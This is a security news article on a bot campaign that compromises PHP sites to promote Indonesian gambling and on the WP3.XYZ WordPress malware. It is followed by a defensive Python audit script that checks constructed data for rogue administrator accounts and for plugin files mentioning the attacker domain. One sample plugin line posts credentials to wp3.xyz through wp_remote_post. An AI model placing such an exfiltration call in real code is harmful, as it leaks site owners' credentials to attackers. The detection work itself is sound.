New Botnet Campaign Targets PHP-Based Web Servers in Indonesia
Date: January 17, 2025
Author: Ravie Lakshmanan
Categories: Web Security, Botnet
Cybersecurity researchers have exposed a new campaign that targets web servers running PHP-based applications to promote gambling platforms in Indonesia. Imperva attributes the activity to Python-based bots that have hit thousands of web apps in high volume over the past two months, a pattern it reads as a coordinated effort rather than opportunistic scanning.
According to Imperva researcher Daniel Johnston, "These attacks appear tied to the proliferation of gambling-related sites, potentially as a response to the pktoto[.]cc," a known Indonesian gambling site. Johnston further stated, "Over the past two months, a significant volume of attacks from Python-based bots has been observed, suggesting a coordinated effort to exploit thousands of web apps."
Malware Campaign Revealed
Separately, a widespread malware campaign has been disclosed that has targeted over 5,000 sites globally to create unauthorized administrator accounts, install a malicious plugin fetched from a remote server, and siphon credential data back to that same server. How the JavaScript malware is initially deployed on these sites is not yet known. The malware has been codenamed WP3.XYZ after the domain of the server used to fetch the plugin and receive the exfiltrated data ("wp3[.]xyz").
Mitigation Measures
To mitigate the attack, WordPress site owners are advised to keep their plugins up to date, block the rogue domain at the firewall, and audit the site for suspicious administrator accounts or plugins, removing any they find. Because the initial access vector is not known, patching alone is not a guarantee; the account and plugin audit is what catches a site that was already compromised.
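The audit step above is easy to get wrong by eye, because WordPress stores roles as a PHP-serialized array in the wp_usermeta table rather than as a plain column. The following Python script is an added example, not code from the article or from the researchers it cites: it decodes that serialized value, flags administrator accounts that are not on an allowlist, and greps plugin files for the wp3[.]xyz domain (in both plain and defanged form). The user rows, the plugin file names and the `/collect` path are constructed sample data and are not indicators from the campaign.

```python
import re

# Constructed sample data modelled on the WordPress wp_users and wp_usermeta
# tables; none of these accounts or timestamps come from the reported campaign.
USERS = [
    {"ID": 1, "user_login": "siteowner", "user_email": "owner@example.com",
     "user_registered": "2021-03-04 09:12:00"},
    {"ID": 2, "user_login": "editor1", "user_email": "editor@example.com",
     "user_registered": "2022-07-19 14:30:00"},
    {"ID": 3, "user_login": "wpx_admin", "user_email": "x@mail.invalid",
     "user_registered": "2025-01-12 02:47:31"},
]
USERMETA = [
    {"user_id": 1, "meta_key": "wp_capabilities",
     "meta_value": 'a:1:{s:13:"administrator";b:1;}'},
    {"user_id": 2, "meta_key": "wp_capabilities",
     "meta_value": 'a:1:{s:6:"editor";b:1;}'},
    {"user_id": 3, "meta_key": "wp_capabilities",
     "meta_value": 'a:1:{s:13:"administrator";b:1;}'},
]
# Constructed plugin files (path -> contents). The rogue one references the
# domain named in the article; the plugin name and URL path are hypothetical.
PLUGIN_FILES = {
    "akismet/akismet.php": "<?php /* Plugin Name: Akismet Anti-spam */",
    "rogue-example/rogue-example.php":
        "<?php wp_remote_post('https://wp3.xyz/collect', array('body' => $creds));",
}

ROGUE_DOMAIN = "wp3.xyz"
KNOWN_ADMINS = {"siteowner"}  # the administrators you expect to exist


def roles_from_capabilities(serialized):
    """Extract role names from a PHP-serialized wp_capabilities value such as
    a:1:{s:13:"administrator";b:1;}. Only roles set to true are returned."""
    return set(re.findall(r's:\d+:"([^"]+)";b:1;', serialized))


def find_unexpected_admins(users, usermeta, known_admins):
    """Return logins holding the administrator role that are not on the
    allowlist, sorted for stable output."""
    roles_by_user = {}
    for row in usermeta:
        # The meta_key carries the table prefix; "wp_" is only the default.
        if row["meta_key"].endswith("capabilities"):
            roles_by_user[row["user_id"]] = roles_from_capabilities(row["meta_value"])
    return sorted(
        u["user_login"] for u in users
        if "administrator" in roles_by_user.get(u["ID"], set())
        and u["user_login"] not in known_admins
    )


def find_files_referencing(plugin_files, domain):
    """Return plugin file paths whose contents mention the domain, matching
    both the bare host (wp3.xyz) and its defanged form (wp3[.]xyz)."""
    host = re.escape(domain)
    defanged = re.escape(domain.replace(".", "[.]"))
    pattern = re.compile(f"{host}|{defanged}", re.IGNORECASE)
    return sorted(path for path, text in plugin_files.items() if pattern.search(text))


def audit(users, usermeta, plugin_files, known_admins, domain):
    """Run both checks and return the findings as a dict."""
    return {
        "unexpected_admins": find_unexpected_admins(users, usermeta, known_admins),
        "rogue_plugin_files": find_files_referencing(plugin_files, domain),
    }


if __name__ == "__main__":
    report = audit(USERS, USERMETA, PLUGIN_FILES, KNOWN_ADMINS, ROGUE_DOMAIN)
    for key, hits in report.items():
        print(f"{key}: {hits if hits else 'none'}")
```

On a live site the same inputs come from a database export or from WP-CLI (`wp user list --role=administrator --fields=user_login,user_registered` and `wp plugin list`), and the file scan is equivalent to a recursive grep for the domain under wp-content/plugins. Treat any hit as a reason to rotate credentials, not just to delete the account or plugin, since the campaign exfiltrates credential data.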